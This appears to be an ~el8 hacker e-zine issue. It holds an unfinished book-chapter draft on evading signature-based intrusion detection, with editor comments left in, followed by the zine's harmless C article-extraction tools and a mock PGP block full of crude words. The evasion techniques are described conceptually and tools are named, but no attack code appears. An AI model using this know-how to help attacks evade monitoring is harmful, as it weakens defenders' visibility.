It is apparent that most IDSs are not always quite ready to run out of the box. They require frequent updating and maintenance to yield long-term success. Some The IDSs that do have hope of detecting unknown forms of attack are anomaly detection based. These systems do not use signatures at all. They instead monitor all network communications as they occur and attempt to build a high level image of typical traffic. A statistical anomaly would then trigger an alert. As the system matures and gains more entropy into its database, it would then theoretically become more accurate. There is some question whether or not a purely anomaly-based detection engine would be very effective, as exploit attempts seem to be quite normal in day-to-day network operation and may fall into the baseline of these systems. As in all things, a little of each is not a bad idea. A strong signature based system supplemented by an anomaly based detection engine should yield a high level of assurance that most intrusion events are monitored.
In the endless security game of cat and mouse, one can forecast the generation of polymorphic statistically normalized attack engines that should provide one more hurdle for NIDS developers to overcome.
Summary
Signature based IDS sensors have many variables to account for when attempting to analyze and interpret network data. Many challenges continue to elude these systems. The lack of information that is available for inspection is difficult to overcome. However, the rate at which many IDS sensors have been maturing is quite promising; Gigabit speeds and flexible architectures supported by an ever growing security community push forward to achieve configure systems that are capable of detecting all but the most obtuse and infrequent attack scenarios.
At every layer of the network stack there are difficulties with maintaining a consistent view of network traffic and the effect of every packet being transmitted. It is quite clear that an attacker has certain advantages, being able to hide in a sea of information while being the only one aware of their true intension.
Packet layer evasions have been well documented throughout the past several years. IDS vendors are quite aware of the many issues surrounding packet acquisition and analysis. Most networks are beginning to filter suspicious packets in any case, that is any types with options and excessive fragmentations. Perhaps in the coming years network layer normalizations will become commonplace and many of these evasion possibilities will evaporate.
The difficulty with analyzing the application layer protocols continues to cause ongoing headaches. Some proxy solutions have begun to take hold but the bottleneck that these systems cause is often too great. They also suffer from similar issues as IDSs, unable to identify classes of attacks that they were not originally intended for.
It is simple quite acceptable to quash malformed TCP/IP packets in the case of an error; the a legitimate end system will would eventuallysimply retransmit. The same is not true for higher layers; a NIDS may have an extremely limited understanding of application protocols and the information they transmit. Polymorphic attacks present a significant challenge that cannot be easily solved with a purely signature based system. These attacks may exist in virtually limitless combinations.
Fix grammar
IDS evasion will continue to be a way of life on the Internet. There will beis an ever-flowing renewing tide of tools and techniques that are developed and refined designed for large-scale implementation (eventually raising the everyday script kitty kiddie into a previously reserved more advanced skill set) to make the job of detection more difficult.. One should continually monitor and investigate network activity to gain an understanding of what to expect on day-to-day operations. hold dear the principles of least privilege, segmentation and auditing to ensure their overall network posturing remains as secure as possible.
Clarify?
Solutions Fast Track
Author: Please fortify these bullet points so they are all full sentences. They should also be a bit more informative and useful to the reader who wants to use them to brush up on the chapter materialyou could add a sentence to each that makes it clearer why that particular point is relevant to the chapter.
Understanding How Signature-Based IDSs Work
Capabilities defined in signature database The capabilities of a NIDS are defined by a signature database. This enforces the requirement for frequent updates to combat the frequency of new vulnerabilities.
Difficult to extrapolate from defined database Most NIDS do not alert even to slight variations of the defined signatures. This affords an attacker the ability too vary there attack to evade a signature match.
Signatures are very specific to a vulnerability slight variations will be missed
Increase the processing overhead required for detection Attackers will continue to vary there evasion techniques such that the processing required to monitor and detect is greatly increased. This would contribute to DoS and evasion possibilities.
Using Packet Level Evasion
Many vendors implement TCP/IP with slight variations. A NIDS has a difficult time in constructing a view of network communications as they appear to other systems. This inconsistent view is what allows an attacker to evade detection.
Hosts may not adhere to RFC specifications and allow some packets where the NIDS would may not. drop
NIDS do not have enough information from the wire to reconstruct TCP/IP communications. With the options and states available in a TCP/IP stack, some ambiguities form as to how a host would interpret information, there is an insufficiently of information transmitted between systems when communicating.
Fragrouter and congestant are effective evasion tools. They implement a number of documented NIDS evasion techniques.
Using Protocol and Application Protocol Level Evasion
Application protocols are difficult to interpret Application protocols are verbose and rich in function. There are many subtle, antiquated and obscure application nuances that make effective application protocol decoding difficult. An attacker may compromise even the slightest oversight.
Applications tend to allow for slight variation, developers intentionally build in error correcting cases that attempt to make sense of any request, no matter how malformed. With a lax of strict compliance to defined specifications, it is difficult for the NIDS to determine the behavior of a network application.
Multiple encoding options exist for data representation, Unicode, uuencoded or hex encoded options exist in many application protocols. These alternate representations complicate the development of detection engines.
Using Code Morphing Evasion
There is always more then one way to do it. When detection hinges on the identification of application code, there are many alternatives to code generation.
Code may be randomly generated The code of an attack may be pseudo randomly generated. Any number of instructions can accomplish similar tasks, the code must simply function there is no requirement of performance or other optimization benefits.
Most exploits will vary from host to host. Variations can be incorporated even when restrictions are placed on the length or type of codes possible.
Frequently Asked Questions
Q: How many IDSs do I need to make them more effective?
A: All networks are different and require varying levels of monitoring. Your particular risk tolerance should help you find this out though. A network witch desired a high level of assurance that they are detecting many intrusion events, should have at least one sensor per network segment (layer 2). It is also desirable to have multiple vendor types implemented when an even hirer higher level of security is needed (one vendors strengths would hopefully fill in gaps from another)
Q: Arent these techniques too advanced for most attackers?
A: Just like most other technologies, attack methodologies and techniques are eventually turned into boilerplate applications that anybody can wield. The layout of the virtual battlefield may change in an instant. The next big worm might wield these techniques, and force a sea-change in the IDS market.
Q: How do I choose the best IDS?
A: Continue to do as much research as possible. The biggest tool that a network architect has is that only they are aware of all the tricks that are deployed on the enterprise. Be creative, use multiple vendors technologies, and implement honeypots for advanced warning of unknown techniques and vulnerabilities. Homegrown technologies (if properly tested and implemented) often do a great service when a high degree of security is required.
Q: Where can I get information about new evasion attacks?
A: The underground scene is typically the catalyst for advancements in security technologies. Frequent online publications, get a feel for where useful information may come from. There is no single source for where all new papers will be distributed.
Check out:
antisec (http://anti.security.is)
Phrack (http://)
Packetstorm ()
Technotronic (http://www.technotronic.com/)
Drop a couple of names, if you would if you like Phrack, some mailing list, etc please mention here.
Q: What do I do if I am inundated with alerts?
A: Secure systems rely on compartmentalization to hopefully contain intruders. If you see that you are being attacked at an abnormal pace, isolate and separate the troubled systems and attempt to identify if there are some hosts with some well-known vulnerabilities or exposures. Correlate your logs and IDS events to give you a better picture of what may be going on. Do not rely on authorities and the network administrators of the attacking networks; they are usually far too overworked or uninterested to give a respectable amount of support.
Q: How do I know that my IDSs are working?
A: Ongoing auditing and testing should be done to ensure that networking systems are properly implemented. Independent reviewers should always be apart of secure systems to ensure a fresh set of eyes evaluate a network architecture and IDS implementation.
[END_CUT] ch16
[END_DIR] articles
.~e~----------------------------------------------------------~e~.
; *16* ELDUMP & ELTAG ~el8 ez1ne t00lz -- s1rsyko ;
`----------------------------------------------------------------'
[BEGIN_DIR] .
[CUT_HERE] eldump.c
/*
-+-+
cat <<'/*++--++*'> eldump.c # */
/**********************************************
* released under (E) licensing ... *
* (E) RULES AND REGULATIONS *
**********************************************/
/*******************************************
* eldump.c for standard UNIX compilers *
* next version: *
* *
* +article extraction (ablility to *(E)*
* specify article number) *[~]*
* +code extract by article number *[E]*
* +GUI interface for file viewing *[L]*
* (most likely curses based) *[8]*
* +ability to update code/articles via *[`]*
* updates/correction posted *[9]*
* on ~el8 website *[9]*
* +much cooler/faster/stronger/portable *
* +Versions for DOS C/COBOL/Asm/Pascal *
*******************************************/
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
/**************************************
* next version of eldump will have *
* a lot more features, this is just *
* a basic code extraction version. *
* - team ~el8 *
* *
* #define ISH_START "[SOI] %s" *
* #define ARTICLE_START "[BOW] %s" *
* #define ARTICLE_END "[EOW]" *
* #define ISH_END "[EOI]" *
**************************************/
/* for verbosity */
#define VERBOSE 0x01
#define VERY 0x10
#define LOTS 0x20
/* char array sizes */
#define LINELEN 80
#define BUFLEN 255
/* Issue Tag Defines */
#define CODE_START "[CUT_HERE] %s"
#define CODE_START_ARGS 1
#define DIR_START "[BEGIN_DIR] %s"
#define DIR_START_ARGS 1
#define DIR_END "[END_DIR] %s"
#define DIR_END_ARGS 1
#define CODE_END "[END_CUT] %s"
#define CODE_END_ARGS 1
#define loop(n) for(;n;)
/* global vars */
FILE *TextFD;
char BaseDirectory[BUFLEN], buf[LINELEN], CodeDir[BUFLEN + BUFLEN],
tmp[LINELEN];
int verbose = 0, linez = 0, codez = 0, dirz = 0;
const char *license = \
"/***********************************************\n"
" * released under (E) licensing ... *\n"
" ***********************************************/\n"
"/* contact ahuger@securityfocus.com for full license */\n"
"/* code copyrighted by ~el8 -- don't infringe! */\n\n";
/**********************
* int article(char *);
* int issue(char *);
**********************/
/* function prototypes */
int code (char *);
int extr (char *);
int
main (int argc, char *argv[])
{
int NumberOfFiles; // For multiple files
getcwd (BaseDirectory, BUFLEN); // error checking is for pussiez
setvbuf (stderr, (char *) NULL, _IONBF, 0);
if (argc < 2) // no options specified
{
fprintf (stderr,
"\033[0;36m"
".---------------------------------------.\n"
"|\033[1;36m /\\/| _ ___ _ \033[0;36m |\n"
"|\033[1;36m |/\\/ ___| |( _ ) _____ _| |_ _ __ \033[0;36m|\n"
"|\033[1;36m / _ \\ |/ _ \\ / _ \\ \\/ / __| '__| \033[0;36m|\n"
"|\033[1;36m | __/ | (_) || __/> <| |_| | \033[0;36m|\n"
"|\033[1;36m \\___|_|\\___/ \\___/_/\\_\\\\__|_| \033[0;36m|\n"
"`---usage-------------------------------'\n"
"\033[m\n"
"\033[7m %s [file1 file2 file3 ...] <option>\t\033[m\n"
"\033[0;32m\n"
".---options-----------------------------.\n"
"|+\033[1;32m [-v]: verbose \033[0;32m |\n"
"|+\033[1;32m [-vv]: very verbose\033[0;32m |\n"
"|+\033[1;32m [-vvv]: very very verbose \033[0;32m |\n"
"`---------------------------------------'\n"
"\033[m",
argv[0]);
exit (-1);
}
verbose -= verbose; // zero verbose
if (!strncmp (argv[argc - 1], "-v", 2)) // if the last option was a "-v"
{
verbose = VERBOSE;
argc--;
}
else if (!strncmp (argv[argc - 1], "-vv", 3)) // "-vv"
{
verbose = (VERY + VERBOSE);
argc--;
}
else if (!strncmp (argv[argc - 1], "-vvv", 4)) // "-vvv"
{
verbose = (LOTS + VERBOSE + LOTS);
argc--;
}
if (argc < 2)
{
fprintf (stderr, "need files...\n");
exit (-1);
}
for (NumberOfFiles = 1; NumberOfFiles < argc; NumberOfFiles++)
{
if (verbose >= LOTS)
{
fprintf (stderr, "eldumping code from %s\n", argv[NumberOfFiles]);
if (extr (argv[NumberOfFiles]) == 0)
{
fprintf (stderr, "[#%i] code eldump of %s: success!\n",
NumberOfFiles, argv[NumberOfFiles]);
}
else
{
fprintf (stderr, "[#%i] code eldump of %s: failed.\n",
NumberOfFiles, argv[NumberOfFiles]);
}
}
else
{
extr (argv[NumberOfFiles]);
}
}
if (verbose >= VERBOSE)
{
fprintf (stderr, "\t%i texts\n\t%i dirs\n\t%i codes\n\t\%i lines\n",
NumberOfFiles - 1, dirz, codez, linez);
}
exit (0);
}
int
extr (char *TextFileName)
{
char arg[LINELEN];
if ((TextFD = fopen (TextFileName, "r")) == NULL)
{
fprintf (stderr, "opening text %s: %s\n", TextFileName, strerror (errno))
; return (-1);
}
loop (!feof (TextFD))
{
fgets (buf, LINELEN, TextFD);
if (sscanf (buf, DIR_START, arg) == DIR_START_ARGS)
{
snprintf (CodeDir, sizeof CodeDir, "%s/%s", BaseDirectory, arg);
if (verbose >= VERBOSE)
{
fprintf (stderr, "creating %s/\n", CodeDir);
dirz++;
}
if ((mkdir (CodeDir, 0700) == -1) && (errno != EEXIST))
{
perror (CodeDir);
fclose (TextFD);
return (-1);
}
if (chdir (CodeDir) == -1)
{
fprintf (stderr, "changing to code dir %s: %s\n", CodeDir,
strerror(errno));
fclose (TextFD);
return (-1);
}
else if (verbose >= LOTS)
fprintf (stderr, "changing to %s\n", CodeDir);
}
else if (sscanf (buf, CODE_START, arg) == CODE_START_ARGS)
{
if (verbose >= VERY)
fprintf (stderr, "eldumping %s\n", arg);
if (code (arg) == -1)
{
fclose (TextFD);
return (-1);
}
}
else if (sscanf (buf, DIR_END, tmp) == DIR_END_ARGS)
{
if (verbose >= LOTS)
fprintf (stderr, "changing to ..\n");
chdir ((!strcmp (arg, ".")) ? "." : "..");
}
}
fclose (TextFD);
return (0);
}
int
code (char *CodeFileName)
{
FILE *CodeFile;
char codebuff[BUFLEN];
chdir ((CodeDir != NULL) ? CodeDir : ".");
if ((CodeFile = fopen (CodeFileName, "w+")) == NULL)
{
fprintf (stderr, "opening code %s: %s\n", CodeFileName, strerror (errno))
; return (-1);
}
if (verbose >= VERBOSE)
codez++;
if (CodeFileName[strlen(CodeFileName)-1] == 'c' &&
CodeFileName[strlen(CodeFileName)-2] == '.')
fputs (license, CodeFile);
loop (!feof (TextFD))
{
fgets (codebuff, LINELEN, TextFD);
if (sscanf (codebuff, CODE_END, tmp) == CODE_END_ARGS)
{
if (verbose >= LOTS)
fprintf (stderr, "end of %s\n", CodeFileName);
fclose (CodeFile);
break;
}
else
{
fputs (codebuff, CodeFile);
if (verbose >= VERBOSE)
linez++;
}
}
return 0;
}
// [CUT_HERE] <NAME> then [END_CUT] <NAME> //
// [BEGIN_DIR] <NAME> then [END_DIR] <NAME> //
/*++--++*
cat <<'[EOI]'> /dev/null
*/
[END_CUT] eldump.c
[CUT_HERE] eltag.c
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#define loop(n) for(;n;)
char *TAG="[(%i) %s]";
//char *TOCTAG="~el8|*iSSue2*[(%u) %s]*iSSue2|~el8";
char *TOCTAG=";;;;;;;;;;;;"
extern char *optarg;
FILE *out;
void t4gz(char *,char*,int);
int
main (int argc, char *argv[])
{
int p;
char *file;
int type;
char *t4g = TAG;
if (argc < 3)
{
fprintf (stderr, "usage: %s <format> <-t> [-f infile] <-o outfile>\n"
"formats:\n"
"\t[-i]: integer output\n"
"\t[-X]: uppercase hexidecimal output\n"
"\t[-O]: octal output\n"
"\t[-x]: lowercase hexadecimal\n"
"[-t] = output table of contents\n",argv[0]);
exit (-1);
}
while ( (p = getopt(argc,argv,"tiXOxf:o:"))!=EOF){
switch(p){
case 't':
t4g = TOCTAG;
break;
case 'i':
type = p;
break;
case 'X':
type = p;
break;
case 'O':
type = p;
break;
case 'x':
type = p;
break;
case 'f':
file = optarg;
break;
case 'o':
if ((out=fopen(optarg,"w+"))==NULL)
{
perror(optarg);
exit (-1);
}
break;
default:
exit(-1);
}
}
if (out==NULL) out=stderr;
t4gz(file,t4g, type);
exit (0);
}
void
t4gz (char *T,char *tag,int io)
{
char articlename[80];
unsigned articleno=0;
int lineno;
FILE *TFD;
char buf[80];
if ((TFD = fopen (T, "r")) == NULL)
{
perror(T);
exit (-1);
}
bzero((char*)&buf,sizeof(buf));
lineno-=lineno;
loop (!feof (TFD))
{
lineno++;
fgets (buf, sizeof(buf), TFD);
if (sscanf(buf,tag,&articleno,articlename) == 2)
{
if (buf[strlen(buf)-1] == '\n') buf[strlen(buf)-1] = '\0';
switch (io) {
case 'i':
fprintf(stderr,"[(%04i) %20s]\t @ \033[1mLine %i\033[m\n",articleno
,articlename,lineno);
break;
case 'X':
fprintf(stderr,"[(%4X) %20s]\t @ \033[1mLine %i\033[m\n",articleno,
articlename,lineno);
break;
case 'O':
fprintf(stderr,"[(%4o) %20s]\t @ \033[1mLine %i\033[m\n",articleno,
articlename,lineno);
break;
case 'x':
fprintf(stderr,"[(%4x) %20s]\t @ \033[1mLine %i\033[m\n",articleno,
articlename,lineno);
break;
default:
fprintf(stderr,"[(%04i) %20s]\t @ \033[1mLine #%i\033[m\n",articlen
o,articlename,lineno);
break;
}
}
bzero((char*)&buf,sizeof(buf));
}
fclose (out);
fclose (TFD);
exit (0);
}
[END_CUT] eltag.c
[EOW]
[EOI]
echo '
lllllll 888888888
l:::::l 88:::::::::88
l:::::l 88:::::::::::::88
l:::::l 8::::::88888::::::8
eeeeeeeeeeee l::::l 8:::::8 8:::::8
ee::::::::::::ee l::::l 8:::::8 8:::::8
_________ _____ e::::::eeeee:::::ee l::::l 8:::::88888:::::8
/ \ / |e::::::e e:::::el::::l 8:::::::::::::8
/ ~el8 \/ /e:::::::eeeee::::::el::::l 8:::::88888:::::8
/ _ / e:::::::::::::::::e l::::l 8:::::8 8:::::8
/ / \ / e::::::eeeeeeeeeee l::::l 8:::::8 8:::::8
\_____/ \________/ e:::::::e l::::l 8:::::8 8:::::8
e::::::::e l::::::l8::::::88888::::::8
e::::::::eeeeeeee l::::::l 88:::::::::::::88
ee:::::::::::::e l::::::l 88:::::::::88
eeeeeeeeeeeeee llllllll 888888888
.g4yd4nb4n.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 31.8-720i
~el80d4yw4r3zhackpussybitchcodefuckcuntsuckHACKlamerlameexploitk
routephrackcotnophreakPLAtheinfancyconceptr00tshipleylkmplaguez!
antiloveADMTESOrootnobodyhackinghackershackerzhackalotF.U.C.K.AA
FEHstrHERTgaiusACZawrJOBEcrackcocainheroinsmokedopeUNIXVMSLINUX!
fluffibunnidatacouriersb4b09xx25x.25ROLMSDMShdlcLAPBPPPPSNSPRINT
internetWAREZLoD/MoDlegionofdoomMastersofdumpstersphonetelcoseno
jduckw00w00cDccultdeadcowcultdeadcatcultdeadjimmorrison2pacrapFi
defacementsrockwwwdefacersdefacethischriscrossthehackerschoice!l
bbsCCC2600BoWSoWWoWCoWPoWprisonersofWarEzDCCfileuploadmp3SEXpusy
violencedeathmurderkillSPAMilovespamSPAFpurduechickenshitpoopLoL
roflmao:D:PchatroomIRCinternetretardchatATTat&tbellmahballz~el8o
roxsuxhackzfuxzerodayz0dayzodayzthesatan!isourgod~el80dayw4r3z4u
-----END PGP PUBLIC KEY BLOCK-----
'
echo 'Extracted eldump.c'
echo 'use $CC eldump.c -o eldump'
echo './eldump ~el8[0] (-v | -vv | -vvv)'
echo